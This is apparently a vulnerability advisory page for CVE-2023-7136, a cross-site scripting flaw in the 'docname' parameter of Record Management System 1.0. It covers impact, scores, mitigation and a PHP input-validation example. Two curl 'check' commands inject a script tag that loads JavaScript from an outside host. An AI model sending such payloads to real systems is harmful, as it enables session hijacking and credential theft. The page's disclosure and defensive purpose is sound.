Platform
php
Component
cves
Fixed version
1.0.1
CVE-2023-7136 is a problematic cross-site scripting (XSS) vulnerability identified in Record Management System version 1.0. This vulnerability allows attackers to inject malicious scripts into the application, potentially compromising user sessions and data. The affected component is the Document Type Handler, specifically the /main/doctype.php file. A fix is available in version 1.0.1.
An attacker can exploit this XSS vulnerability by manipulating the 'docname' argument within the Document Type Handler. By injecting malicious JavaScript code through this parameter, the attacker can execute arbitrary code within the context of the user's browser. This could lead to session hijacking, defacement of the application, or the theft of sensitive information, such as user credentials or personal data. The impact is amplified if the application handles sensitive data or is used in a critical business process. Successful exploitation could allow an attacker to gain unauthorized access to the Record Management System and potentially compromise the entire system.
This vulnerability has been publicly disclosed and a proof-of-concept may be available. The exploit involves injecting a script tag directly into the 'docname' parameter. The vulnerability was published on 2023-12-28. The CVSS score is 2.4 (LOW), indicating a relatively low probability of exploitation in a standard environment, but the potential impact can be significant if exploited successfully.
Organizations using Record Management System version 1.0 are at risk. This includes businesses relying on this system for document storage and retrieval, particularly those with limited security expertise or those who have not implemented robust input validation practices. Shared hosting environments where multiple users share the same server instance are also at increased risk.
• generic web:
curl -s -X POST "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i script
• generic web:
curl -I "http://your-record-management-system/main/doctype.php?docname=><script src='https://js.rip/b23tmbxf49'></script>" | grep -i script
disclosure
patch
Exploit status
EPSS
0.13% (33rd percentile)
CVSS vector
The primary mitigation for CVE-2023-7136 is to upgrade to Record Management System version 1.0.1, which contains the necessary fix. If upgrading immediately is not feasible, consider implementing input validation and sanitization on the 'docname' parameter to prevent the injection of malicious scripts. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update input validation routines to prevent similar vulnerabilities from arising in the future.
Upgrade to a patched version of the software. If no version is available, sanitize user input in the 'docname' parameter in the '/main/doctype.php' file to prevent the execution of malicious JavaScript code. Implement validation and output encoding to prevent XSS attacks.
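The input validation and output encoding recommended above, as an added example that is not code from Record Management System. The helpers `validate_docname()` and `h()`, the allowlist policy and the sample values are assumptions, since the page does not show the source of /main/doctype.php.

```php
<?php
// Added example: hypothetical handler logic, not the code of /main/doctype.php.
// Requires PHP 8.0+ (uses the `mixed` type).
declare(strict_types=1);

/** Encode a value for an HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Allowlist validation for a document type name (assumed policy):
 * 1-64 characters drawn from letters, digits, space, underscore, hyphen.
 * Returns the trimmed name, or null when the input is rejected.
 */
function validate_docname(mixed $raw): ?string
{
    if (!is_string($raw)) {            // rejects array input such as docname[]=x
        return null;
    }
    $name = trim($raw);
    // preg_match returns false on invalid UTF-8 under /u, which is also rejected.
    if (preg_match('/\A[\p{L}\p{N} _-]{1,64}\z/u', $name) !== 1) {
        return null;
    }
    return $name;
}

// Vulnerable pattern (value reflected without encoding), shown for contrast only:
//   echo '<td>' . $_POST['docname'] . '</td>';

// Constructed sample inputs, including a script-tag value of the kind the page describes.
$samples = ['Invoice', 'Purchase Order 2024',
            "><script src='https://example.invalid/x'></script>", ['a']];

foreach ($samples as $raw) {
    $name = validate_docname($raw);
    if ($name === null) {
        // Reject the request; anything echoed back in the error is still encoded.
        $shown = is_string($raw) ? h($raw) : '(non-string input)';
        echo "rejected: {$shown}\n";
        continue;
    }
    // Persist with a prepared statement (omitted), then encode again at output time.
    echo '<td>' . h($name) . "</td>\n";
}
```

Validation narrows what is accepted, but the encoding in `h()` at every output point is what stops a stored or reflected value from being parsed as markup, so both are applied.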
CVE-2023-7136 is a cross-site scripting (XSS) vulnerability in Record Management System version 1.0, allowing attackers to inject malicious scripts via the 'docname' parameter.
If you are using Record Management System version 1.0, you are potentially affected by this vulnerability. Upgrade to version 1.0.1 to mitigate the risk.
The recommended fix is to upgrade to Record Management System version 1.0.1. As a temporary workaround, implement input validation and sanitization on the 'docname' parameter.
While active exploitation is not confirmed, the vulnerability has been publicly disclosed and a proof-of-concept may be available, increasing the risk of exploitation.
Refer to the vendor's official advisory for Record Management System, which should detail the vulnerability and provide instructions for remediation.